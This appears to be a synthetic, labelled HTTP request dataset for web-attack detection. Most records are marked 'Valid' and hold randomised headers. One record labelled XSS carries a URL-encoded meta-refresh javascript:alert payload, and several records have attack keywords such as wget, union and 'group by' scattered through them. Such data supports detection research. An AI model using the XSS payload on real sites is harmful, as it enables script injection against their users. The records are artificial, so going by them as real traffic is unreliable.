GET /tEl4@5b-a-o4/94AMEgRuquOttN-rO9aR/pzmI/dlncM.Fm3mLMF5c_GaF/ruSF4m6R/ZgS@connect5/hibesrnwdtsGu/Ltulm/6X8KEJyjY..MEK/edS3H.gif?oteebaeea=tsokYIeeTat&nvUtAHnhzu8i=kidjhrhn&9Hosg7=714&6mwget6wL.=3076321&E9vOmzWMX=exT1DvXAApft&AnHtarloww6yeme=qT&DhcmdmB=d4Ie20sta8 HTTP/1.1
Host: 250.84.237.53
Connection: 0cytsyo4
Accept: application/*, image/png;q=0.7
Accept-Charset: iso-8859-3;q=0.5, x-mac-arabic, x-mac-ce, euc-kr;q=0.0
Accept-Encoding: identity, identity, compress
Accept-Language: ieotab5o-dijeuta, RzcNeB4-x;q=0.3, 2-c;q=0.7, giExao-ragih;q=0.0, tedumq-adoAWs;q=0.7
Cache-Control: max-age=5
Client-ip: 48.214.167.96
Cookie: as7let2h7omeu=537
Cookie2: $Version="82"
Date: Sun, 10 Dec 06 21:47:18 CET
ETag: W/"wRtsmOaMQA1-w3n"
Expect: t5Inns8i=dicfi
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Sun, 19 Apr 09 02:43:24 UTC
If-Unmodified-Since: Wed, 20 Aug 08 21:33:23 CET
If-Match: *
If-None-Match: "jpDVmXxRbj3eGVpN"
If-Range: Sat, 15 Nov 08 07:09:31 UTC
Max-Forwards: 2777
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic aG9vZjp0bzlhZW8=
Authorization: Digest uri=/sa6s/eyhr/soe5gb.jpeg
Range: 85-22
Referer: /ujifh/obat/pg0gnaed/nhOeep.png
TE: deflate,trailers,deflate;q=0.4
Trailer: TE
User-Agent: rWsIWZbj http://www.eediiihn.st
UA-CPU: Sparc
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1944x150
Via: FTP/0.7 159.127.22.166, sTor/0.6 www.n4n8.css, nsl4/3.2 www.titz.gif:78524
Transfer-Encoding: deflate
Upgrade: cRSP/8.6, no8s/8.1, 7spiw/8.5
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 224.201.232.196
X-Serial-Number: 2177345757
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13311
Start - Id: 47365
class: XSS
GET /erhnaieHsehMonfq7rt/cX.aspx?nd8nsTcjdsE=cexec++tl+i%40iupdateaccess_log%5DmI&Ttst=ymetcs%3CJAin%7Cyphp%5B%3Cecrosr&9XZzThttpB7xw_=9988504155&hleEarerad7e=%5Bhe&Pi=rE5WGDMI&jcasneeis2=nAs1lczn&LzNEn=4&Fhhotmcldnqdry=%3Cmeta+++http-equiv++++%3D+++%22+++refresh+++%22++++content++++%3D%22++0%3Burl%3Djavascript%3A++%5Balert++%28%27olnlh%27%29%3B%5D+++%22+++%3E&oss5GS9EdhtM1eo=ev&ctewidltCahs71c=nhxoFoebieaeahhtU HTTP/1.0
Host: 38.72.191.108
Connection: keep-alive
Accept: video/quicktime, audio/basic;q=0.3, image/*;q=0.8
Accept-Charset: windows-1253;q=0.5, euc-jp
Accept-Encoding: 
Accept-Language: 5E-ep6rswb;q=0.5
Cache-Control: only-if-cached
Client-ip: 118.97.198.10
Cookie: edmg3o=yKdY9j-diP;e3px4ln=ac;Oaweih=oq1qe;lSeI6oi=sDi;ooeantjsqef= %and
Cookie2: $Version="004"
Date: Thu, 14 May 09 14:43:59 UTC
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: Rlpr@aeautrol.org
If-Modified-Since: Sun, 11 Sep 05 03:55:38 UTC
If-Unmodified-Since: Tue, 19 Jun 07 05:35:27 CET
If-Match: "bolaVc@GADCm-kwZJ"
If-None-Match: *
If-Range: Tue, 01 Jun 04 01:46:41 GMT
Max-Forwards: 78
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM b3lobHJ0bnRjY2FpRHN1YTkzeHMyb2NvdHJ0eXFlaXRFb2Fnbmhh
Range: -773710,2145-890
Referer: /ow7h1E/iahe2.aspx
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/6.8 (X11; U; Unix 3.6; er-nm; rv:7.6.0) Gecko/97525451
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 605x5902
Via: 4.5 www.ra7ade.gif:96022, Rzlm/8.3 183.113.72.221
Transfer-Encoding: srSoe; iOhim=atq4
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47365
Start - Id: 8158
class: Valid
GET /ergattEentM/ea/mMvvXW8MhwzfRJ-/ezass/aus2elwh/Uar1xcfrz6rtegoat/uqn8fuei3a/Sdtiikfshoyktbo/lpn6TvxYtRNLDIK-pEDz/t-uslN.kiBeWBVWDfA2c/7sjthre.htm?4dd=yy2to&pnWnrg2rl09ewt=r0iHnWG%406&e1ft=tlagsahae&emnTlr7gm5y=niinclude&nPpUUak=56346573 HTTP/1.0
Host: 143.136.101.126
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.3
Accept-Encoding: compress
Accept-Language: 5nd-t49e, c2e6-ui;q=0.7, ais-Sot5tnu;q=0.0
Cache-Control: only-if-cached
Client-ip: 217.195.40.19
Cookie: RtaegprhvguvIe=08;rN=7920577;nred5fhce=3583213;iuLot6Mrah7=94671;w7hrtxu=qoeSg$ke ;YMcN=h7nvt
Cookie2: $Version="339"
Date: Sun, 16 May 04 20:56:53 UTC
ETag: "bG1Yij9Z4mr92J0nm"
Expect: 100-continue
From: ueibes13@fbf2z0esc.net
If-Modified-Since: Mon, 25 Dec 06 03:31:45 UTC
If-Unmodified-Since: Sat, 10 Jun 06 11:01:02 CET
If-Match: *
If-None-Match: "EbuiuqPvuC-GxU1z8-n"
If-Range: Thu, 29 May 08 01:26:59 GMT
Max-Forwards: 120
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: icItwz 0ideTrr=voci
Authorization: Digest cnonce="snaeyno4"
Range: -340,51-69621,105-24
Referer: /weadje.php
TE: chunked,gzip
Trailer: Host
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 4.6; ei-Gn; rv:5.4.5) Gecko/04861005
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2774x909
Via: 2.3 125.161.212.62:4, 7.3 www.nat1.png, FTP/8.3 www.taaaeo.png
Transfer-Encoding: identity
Upgrade: eqnale/1.9
Warning: 594 www.tyqCOlp2.jpeg "2shGrc11roelyewtdan" "Fri, 28 Jul 06 01:46:42 CET"
X-Forwarded-For: 110.129.233.176
X-Serial-Number: 255747692947536
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8158
Start - Id: 34280
class: Valid
POST /cT0w1Js.html? HTTP/1.1
Content-Length: 233
Content-Language: r,panbxemd
Content-Encoding: identity
Content-Location: /0ral/a0hOpL/phMSeg.php3
Content-MD5: eGxoYVI1M3NvdHNpcnJyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Oct 08 19:14:08 GMT
Last-Modified: Fri, 06 May 05 05:33:39 CET
Host: www.nu8h.org
Connection: stom8o
Accept: application/x-tar;q=0.7
Accept-Charset: iso-8859-1;q=0.5, windows-1257, shift_jis, iso-2022-jp;q=0.6
Accept-Encoding: *
Accept-Language: ta-eseal;q=0.4, o-frttdm;q=0.9, rt-ryoDe;q=0.0
Cache-Control: min-fresh=8
Client-ip: 89.182.100.174
Cookie: sddtfhyO8stns5m=tnoShwphameut;0qmailO7bA=dLx;Cryj== sock_stream%yaLdaAu;ei=|@8hSsau
Cookie2: $Version="3"
Date: Wed, 18 Aug 04 06:25:31 UTC
ETag: "o6IfDdnAwtFsExA-Nzox"
Expect: 100-continue
From: tC9uuSh@rHslt.uk
If-Modified-Since: Fri, 28 Jul 06 24:14:10 CET
If-Unmodified-Since: Sun, 22 Feb 09 04:32:02 CET
If-Match: *
If-None-Match: "b-orwzRdR1k2r01o1"
If-Range: "W0UJ-54hr.R-C1H0V8f"
Max-Forwards: 4
MIME-Version: 1.7
Pragma: 5nee2se=amh8e5e
Proxy-Authorization: NTLM b3JtZ3FpaDFkSW5pcmhseWVucnNlZGkxb280bmZlb2l0YXRydzNndHNJaXM=
Authorization: NTLM ZXVsTk5ydm5tc3Rkb3JkYU9uYW9SbE5pdHNtaXU3YWRhckFzZW5t
Range: -1
Referer: /seiylu/rpkblq/nnc6efao/rhxad0eE/h4jTaee.aspx
TE: trailers
Trailer: Max-Forwards
User-Agent: 5hiOiiui
UA-CPU: 68000
UA-Disp: 693,674,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1417x508
Via: 3.0 www.titi8miT.gif, FTP/7.1 www.saEte.jpeg
Transfer-Encoding: itics; nfdfs8=d4tCvai
Upgrade: onuaa/7.8, tZmef/6.9, uhou/2.5, grup6/7.0
Warning: 445 www.dRtgo.jpeg "eeTzgb" 
X-Forwarded-For: 23.54.143.100
X-Serial-Number: 437295181628210
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ihausxtFcyeTneh=8L&nsplu=jt&Iumxiaitn=uhH2keLvJ8&rlt=909004&nmetyc3=84346247&Qriniag=1&-PsLtw=eNHAvU&2bodyy.=hR0AominseoElb&odeQeueann=l5rLetdrierjdp&a0ari1=e n&bYAc7xCGRjsr=DnCtoheI a&c1aiGszles=ei0ehionf ahi&z.xeAoscriptf== r@ 

End - Id: 34280
Start - Id: 17003
class: Valid
GET /30qO9X9Om/7OnGGgo-/VB-lib/eoA@PW2/4d6CpLav_i/tjq47EGB8GZAs/3fRdI/Puw/dhDSvrh/rw3eloDnrVe.tiff? HTTP/1.1
Host: 101.4.59.21
Connection: keep-alive
Accept: text/*, video/quicktime
Accept-Charset: iso-8859-8-i;q=0.3, euc-cn;q=0.2, x-mac-roman, ks_c_5601-1987;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: min-fresh=69
Client-ip: 121.189.169.43
Cookie: Ten04nxrs=etmpyoptG;2re5i9isap=t ieestDi;ztk3retocamohK1=780820678
Cookie2: $Version="1"
Date: Sun, 02 May 10 04:56:06 UTC
ETag: "4SlloZx1TGi3_yjS.N1i"
Expect: erE2E6i=yatt4c;tiKciwns=lw2f
From: aYei@It3si.net
If-Modified-Since: Fri, 24 Sep 04 01:16:25 GMT
If-Unmodified-Since: Fri, 08 Sep 06 23:35:14 CET
If-Match: "pAA.U4JbhhsmeM40"
If-None-Match: *
If-Range: *
Max-Forwards: 6329
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ayD9e codPhMon=eailrU
Authorization: hosg Olsuo4=hmg2otzq
Range: 083284-20717,966433-49880
Referer: /qct6/EceittcS/erono.nsf
TE: gzip,deflate,chunked
Trailer: Upgrade
User-Agent: tf19phO/9.7.2.2.4
UA-CPU: StrongARM
UA-Disp: 065,8353,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 044x401
Via: 3.3 114.31.35.56:8785, FTP/6.5 243.218.60.99:8535
Transfer-Encoding: deflate
Upgrade: cieo2/7.8, cai/2.4
Warning: 517 131.56.155.79 "vsek" "Thu, 13 Jul 06 04:49:53 UTC"
X-Forwarded-For: 141.42.67.105
X-Serial-Number: 26236136
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17003
Start - Id: 8640
class: Valid
GET /lw2F_5/ku3.WCuMr/arvzI11-/99QZtY4D@Ilx_.pl?oosashoi=tbieaccept2da-sa7e&dicetnsgbcaihax=iey&lFb=8 HTTP/1.0
Host: www.xdierfey.fr
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 245.251.141.105
Cookie: dmpKV=9;uw7dimohii=hO
Cookie2: $Version="64"
Date: Sun, 26 Jul 09 15:35:45 GMT
ETag: "OCzV3eeWDZdwE5-xvo"
Expect: nvi4
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Sun, 01 Feb 04 15:41:28 GMT
If-Unmodified-Since: Sun, 14 Mar 04 18:52:10 UTC
If-Match: "eO863S-E4mp9uBYc2h6"
If-None-Match: "aLBaJWcd9-f8XQI19F"
If-Range: Mon, 05 Feb 07 13:28:58 CET
Max-Forwards: 8465
MIME-Version: 8.4
Pragma: ddnern=luh
Proxy-Authorization: Digest opaque="hnqcE"
Authorization: Basic RXJlaXhzOmZydmdkbw==
Range: -11,3-,96804-
Referer: /dsGE21h/lule/awowsgs/eve7nle.jpg
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.1 (X11; U; Unix 2.9; dw-ui; rv:3.7.4) Gecko/32205567
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8393x485
Via: 2.5 www.9ndh.htm
Transfer-Encoding: gzip
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 978 www.7otT.css "fraauadw2rek0lel5" "Sun, 20 Jul 08 18:39:31 CET"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8640
Start - Id: 30693
class: Valid
GET /2K_SRbxTT_VSiAVa81X/eetgnm/pS6AItOrDV/12DFq4jQ_/kVbCv5dyB/wEottettza/t-NZ@DpYUCn1BCN.@Bg/odyEva3lXBvKL/pejBdkC/lDee4rtcjWgrnehl/nrsniewnScxns7zon/7ieMspVhBs.msf? HTTP/1.0
Host: www.Shaiamissh.be
Connection: ewvt0ja
Accept: image/*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: 5fx-itA4
Cache-Control: min-fresh=651
Client-ip: 42.254.160.16
Cookie: trDersa=donyartsoavlo;diet=vvelht i
Cookie2: $Version="55"
Date: Fri, 16 Nov 07 05:07:47 GMT
ETag: W/"aR0XKp0GV0OmR3jxMqV"
Expect: hyT0deW=eeuh
From: aeec@eeAs.fr
If-Modified-Since: Sat, 20 Jun 09 15:31:12 UTC
If-Unmodified-Since: Fri, 29 Jan 10 06:46:00 GMT
If-Match: "xhnrNB3VlH.n@PBb3"
If-None-Match: "q@QhWz@YlFSoPZXTQm"
If-Range: *
Max-Forwards: 79
MIME-Version: 7.4
Pragma: aza1ef1a='5ilt'
Proxy-Authorization: Digest response="2A65cd9EabBC61E562DdDFBfeDaAebf9"
Authorization: Basic bWlkUzp0YW9hbDZrcw==
Range: -254
Referer: /5e7oei.js
TE: trailers
Trailer: Upgrade
User-Agent: D3goa (rmdbxxx5M; u5aMZL; aPfbF@gw; sLdb5jbL)
UA-CPU: 68000
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: 6.1 182.125.150.162:49, 0oo/5.1 www.iRpesk.gif
Transfer-Encoding: hioh
Upgrade: caib/8.0
Warning: 616 107.248.166.249 "sndb" 
X-Forwarded-For: 229.134.94.56
X-Serial-Number: 62673072943112918
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30693
Start - Id: 24784
class: Valid
GET /f9DhXvhHHzurw_/iwqWAG/4iV8logfwwindow.open86yp@union/vtTmLeo0L/7PL7TAk2ZBW78dwEo.sh?tdlrorg=%2Ba%3De&ttN=55&2iztr6sfe1p3aae=n0dt%7E%3Boeyme85%5Cn6&xnnne=ir HTTP/1.1
Host: www.nigtwq6h.biz
Connection: close
Accept: audio/*;q=0.5
Accept-Charset: windows-1252;q=0.2, iso-8859-7, iso-2022-kr;q=0.9, iso-8859-5;q=0.4
Accept-Encoding: 
Accept-Language: A9tn-7nnijgrh;q=0.6
Cache-Control: only-if-cached
Client-ip: 247.158.174.187
Cookie: sd71iE=gafyNemolel;esnur=ina> nuea>nhwtnru;iisihovsjah=4359
Cookie2: $Version="86"
Date: Mon, 18 Jan 10 06:32:14 GMT
ETag: "_9OaFhpSDrI2QqRfunJ"
Expect: 100-continue
From: iesi0goR@Pnih.ch
If-Modified-Since: Mon, 31 Jan 05 24:54:02 GMT
If-Unmodified-Since: Wed, 20 Jul 05 04:48:00 UTC
If-Match: *
If-None-Match: "n4JcPzPN..vdmyg"
If-Range: Mon, 02 Feb 09 22:20:29 UTC
Max-Forwards: 24
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Nixaoe ihecer=0gNx
Authorization: Digest realm
Range: 0-7,-481455
Referer: /geap6du/lvvkhslz/remyp8ei.cgi
TE: trailers,deflate
Trailer: Accept
User-Agent: tpAtsaelt (erKxcE; 4z@zsS; tnnmVou)
UA-CPU: MIPS
UA-Disp: 1309,0345,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 540x246
Via: 4.6 150.18.108.3:7, HTTP/9.5 www.rfet6l.htm
Transfer-Encoding: identity
Upgrade: hteo/0.4, eeior/7.7
Warning: 860 www.bs37c.png:5265 "rnistmsoesi" "Sun, 27 Mar 05 17:11:49 UTC"
X-Forwarded-For: 94.66.48.118
X-Serial-Number: 05073071780221168240
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24784
Start - Id: 27
class: Valid
GET /esz1suiEhyrds3t/Bgxp_/3_ERiOHwhere/dsfnhic/naqftganfdou/iInpTEGBXqrdZry/ojzGhUG4Y-2L1/5sRnhmthrtfmyio0jme/m_6RBm-eNP42y8bo8v/ilXHI.z5/aRBhFU1.msf?td=asci&ES1replace3=52362&nlshHinhtkd=40&hlyfdtbN=hHbl&berhorh6rtut=5550&lnh6qmlenaj=iwgroup+bywinvnlhFrrcpoe1&iesBtehida=pWZYaPc4q&uro=ty48&czZUsZtV1L=d1.qNa&oa=8&5ZoYKS56=mviHsutneo&t5L=1163&veso1bom9gih=lnNiiueioficgElso&tuiMnbrh=2arechouiG&sltTlelttoqoeW=Ss HTTP/1.0
Host: www.owqxaEpe.net
Connection: 8ue0
Accept: */*
Accept-Charset: iso-8859-7, windows-1250
Accept-Encoding: *
Accept-Language: *
Cache-Control: i=f
Client-ip: 198.201.173.41
Cookie: eydsrrIeehacrn=0;eexghzinhB=o3.5DCr8
Cookie2: $Version="385"
Date: Mon, 19 May 08 21:33:52 GMT
ETag: W/"Dt52Wakjix10rkNRx8i"
Expect: 100-continue
From: T11b@lathr.st
If-Modified-Since: Sun, 10 Jan 10 01:27:18 GMT
If-Unmodified-Since: Wed, 12 Jan 05 05:09:06 GMT
If-Match: *
If-None-Match: "NQ40hdzMS@ClRJgPuDH"
If-Range: Thu, 14 Oct 04 22:06:54 CET
Max-Forwards: 0826
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: NTLM bGlya29tZWFpaWlldXJndHFuZ2FSdHBIaWh6VG91Z1Jmb3VkOA==
Range: -54670
Referer: /ryuty/oCsse/ni82dpiE.msf
TE: gzip;q=0.1,trailers
Trailer: From
User-Agent: islecb2ts (c0o0GqsUB; 4BScye; aj1zDw; sTIxHSdVC)
UA-CPU: PowerPC
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2292x8708
Via: 3.6 144.90.172.236, 1.3 150.254.29.141, 8.9 www.atmhae.js
Transfer-Encoding: gzip
Upgrade: itjy/6.5, 1lqtdt/0.0, leXaet/0.0, dw2/4.2
Warning: 927 www.uEPrbtt.js:5292 "ywqs8f" 
X-Forwarded-For: 20.155.227.227
X-Serial-Number: 436492
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27
Start - Id: 29881
class: Valid
GET /o0jbYyBieiaohr5/wrEB2-zzp1jf093k.html?7skeniontn=%24%3Dl&ww7i=rcelgxp_logcdmailfdelete+%3FraSad&bhhuee=+onlf&trt4=32007&G6ps1s_GOmail=ePozI16kaj HTTP/1.0
Host: www.uenhU.ch:36
Connection: close
Accept: audio/*;q=0.4, application/rtf, application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: oO='edlTo'
Client-ip: 214.124.111.84
Cookie: 4nb=39333;e5eeahi=599
Cookie2: $Version="8"
Date: Fri, 18 Nov 05 18:13:30 CET
ETag: W/"LOK2IG.-fhGIhMW2gy"
Expect: ioat=tibft
From: enhtcy2@oriacunyla.com
If-Modified-Since: Thu, 20 Mar 08 10:17:15 CET
If-Unmodified-Since: Thu, 17 Jan 08 07:30:14 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 01 May 10 12:27:59 GMT
Max-Forwards: 568
MIME-Version: 7.6
Pragma: Nhss97='60s6zf'
Proxy-Authorization: NTLM Z2F1b2VsdW90RXRwcmRwV2Vuc2F0dGVhZW5zbDhlZmFzbnQ=
Authorization: tszclc aro6=tjr4rj
Range: 71-
Referer: /sdYeo/7Olrt/nkrt/mneprrgr.dll
TE: trailers
Trailer: Via
User-Agent: odp7fti3Yw http://www.roneotnr.cz
UA-CPU: StrongARM
UA-Disp: 754,5719,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 952x914
Via: 9.3 www.nwaast.htm, FTP/2.3 90.227.197.11, HTTP/5.8 www.Ii4e.shtml
Transfer-Encoding: compress
Upgrade: evdhet/6.4, yugwb/0.4, treioj/7.5
Warning: 039 www.exmwec.shtml "dmksdpeslltzeswra" "Tue, 13 Apr 10 24:10:46 CET"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29881
Start - Id: 18508
class: Valid
GET /atuabeteez8sQ9Ti/l_WJIgR/tnaNei/ee6a9eneftxse/tOrO6-nKKwOybich/0y/jeyp6dRwDhoiehhMae/mm@JGfgr_8hug.cgi?9nZndQ9Mr=eo5group+byt+sock_streamlnIprocessing-instruction HTTP/1.1
Host: www.mmyalexd.cz:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp;q=0.7, utf-7, iso-8859-9, euc-kr
Accept-Encoding: 
Accept-Language: mntuhw73-umacvAr;q=0.6, 1-srtmej, Ttbqdbn0-jhchuto
Cache-Control: no-transform
Client-ip: 22.132.39.27
Cookie: La7tNieci=o9n9pcDKk;3arws2qdd=19123;eoSeieeoyhj=ee1;jY2WO_T=78108742;rccnofhmlce8=79441732
Cookie2: $Version="7"
Date: Mon, 06 Apr 09 09:40:15 CET
ETag: W/"Iwq_AF5oIHbdgL1"
Expect: eumwO4l=ltssvua;aeslNi8
From: Titeo@tuuSdemun.uk
If-Modified-Since: Mon, 30 Oct 06 24:21:49 UTC
If-Unmodified-Since: Thu, 16 Dec 04 19:37:21 UTC
If-Match: "rJdeI.tMoW6QNVvGE"
If-None-Match: "gBlTknLK6Pns1dD"
If-Range: *
Max-Forwards: 804
MIME-Version: 2.2
Pragma: no=3jo
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: Basic cWR0ZXJjdTplaHN0c3B0YQ==
Range: 29051-71
Referer: /afLr/4nnBe01/aasejlei/rtry/dwsdcdq.php3
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: r8uxswDHD. http://www.N8ecuDse.gov
UA-CPU: 68000
UA-Disp: 973,9699,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 376x4288
Via: HTTP/9.4 247.116.245.161, 9.3 www.xoeet.shtml, HTTP/1.1 www.csagnhs.shtml
Transfer-Encoding: gzip
Upgrade: tlAedr/6.6, ae8or/3.2, l0c2rn/3.3, t3stse/1.9
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 1163774766
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18508
Start - Id: 29401
class: Valid
GET /ogCzjit1Ou2MqXWs/-XO1emOrCYziandbv/eoDehenpc5wno/fb/f1T.TU_fIYbEADw/nKq_z9pX/OZy3.sh?vihYra=5721&lhn934ceogaor=4TTxEG&gtdkiepl=wgetehtersaxgiw&feu61t8aUnes7=oswotnmebie&u0l9B=140774&er=5 HTTP/1.0
Host: 127.198.154.41
Connection: close
Accept: image/jpeg;q=0.2, text/*
Accept-Charset: euc-kr, iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 152.201.222.227
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="73"
Date: Sun, 13 Jan 08 08:45:20 CET
ETag: W/"r@L8Li8GcYN1uefJ"
Expect: 100-continue
From: onTs@ajeeiGu.com
If-Modified-Since: Fri, 22 Jul 05 21:37:24 CET
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
If-Match: "Z0cy_sLHNeH6ZLUVm."
If-None-Match: *
If-Range: "aBfN1jM2WV-I0UrSl"
Max-Forwards: 898
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest response="A3dad1771A337dd5b4BEC4D3d631aeF3"
Authorization: Digest username="erea"
Range: 61375-,6799-
Referer: /s3tipcjt.html
TE: deflate,trailers,chunked
Trailer: Range
User-Agent: Mozilla/6.5 (X11; U; Solaris 0.3; h7-14; rv:0.8.2) Gecko/00880267
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0011x3310
Via: 2.5 145.27.93.211
Transfer-Encoding: identity
Upgrade: hoonng/3.0, etnsa/4.8, wUr/4.5, pgotom/4.2, r7etDt/6.9
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 29401
Start - Id: 32884
class: Valid
POST /bon4rweEriiiltSs/esAyg8uajd/tLKQsmAkrp_rrFVOUi/dgqmrAW/fuhluhsnuhlt/AQ/srs5nno4ntelUtoof/o0sdo/nlAT/openwindow.openiM/h9te2/oFsgh5DxgJiafRD7.asp? HTTP/1.1
Content-Length: 125
Content-Language: 4owws,otoo
Content-Encoding: identity
Content-Location: http://uOeevn.fr/RtosR/ena5s1An/noseenr/e47wb/2geer.msf
Content-MD5: N0swcmx2dXRyZXNvNnJ0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Jul 08 21:03:09 CET
Last-Modified: Mon, 10 May 04 09:38:36 CET
Host: www.soyT.fr
Connection: otXtbh
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: CnbyArr7-UBibj, sopn-nm9e, E-sm1mr;q=0.4, nidcy-y9iced, benanha-san
Cache-Control: no-store
Client-ip: 12.98.135.178
Cookie: e3gaRu=ieew;iiNNehe1syten=754
Cookie2: $Version="8"
Date: Sun, 12 Nov 06 03:08:09 CET
ETag: W/"T7sqOVkzUqv42FeQ_P"
Expect: 100-continue
From: heae@rytmtosHp.biz
If-Modified-Since: Mon, 29 May 06 01:21:08 GMT
If-Unmodified-Since: Sat, 17 Dec 05 03:54:33 CET
If-Match: "wML_qTTCRKejqsgZ"
If-None-Match: "k7KwRFJiPytjtusMMvF"
If-Range: *
Max-Forwards: 161
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM b2lnbkFocnRJcDhuZWRlN0F0ZWNPZWlvZ3hZcmlzaUppdGg=
Authorization: Basic cGlxYXY6bWFzYXZF
Range: -11
Referer: http://oeJ6.gov/0nelosnR/speO3iyk/Aimwqty/feyanvn/wnewseeu.sh
TE: trailers,trailers,gzip
Trailer: Cache-Control
User-Agent: gsiuphydno7todAlw
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: 2.9 www.Etro.css:7006
Transfer-Encoding: tdrona; et5tat=rubee
Upgrade: rvs/0.3, rteao/7.9, csrh/4.1, a1iosi/1.7
Warning: 033 141.231.242.145 "t2po3soltutrrfuxesh" "Fri, 15 May 09 15:44:54 CET"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

adoRc8rmkt5=Ci O%&.autoexecuconnectHQf=cht2ifuaIrt&h7w2qLTumcbat=eh9Vuz6m&rdleefske=iwdtt&lt=h9Tiila7s&iDmDghecc=aOd87xnMfm

End - Id: 32884
Start - Id: 21851
class: Valid
GET /wgetERSAS13lg7cmail/dC70eee.mspx? HTTP/1.0
Host: www.wamjrat.uk
Connection: keep-alive
Accept: application/*, audio/x-wav
Accept-Charset: iso-8859-7, x-mac-icelandic
Accept-Encoding: *;q=0.4
Accept-Language: yTdnosnv-Eeolad;q=0.9, t-eotthiv, henu3-zeiA3n;q=0.7, 8dth-lLtn
Cache-Control: car='oetnn'
Client-ip: 210.60.139.221
Cookie: esEee=xYGdPwamVhPQ
Cookie2: $Version="89"
Date: Sun, 31 Dec 06 21:02:36 UTC
ETag: "VexyRQEEUiRAvZRDP8Xv"
Expect: 100-continue
From: rayngcn@4eotaro.net
If-Modified-Since: Mon, 09 Feb 09 15:16:15 CET
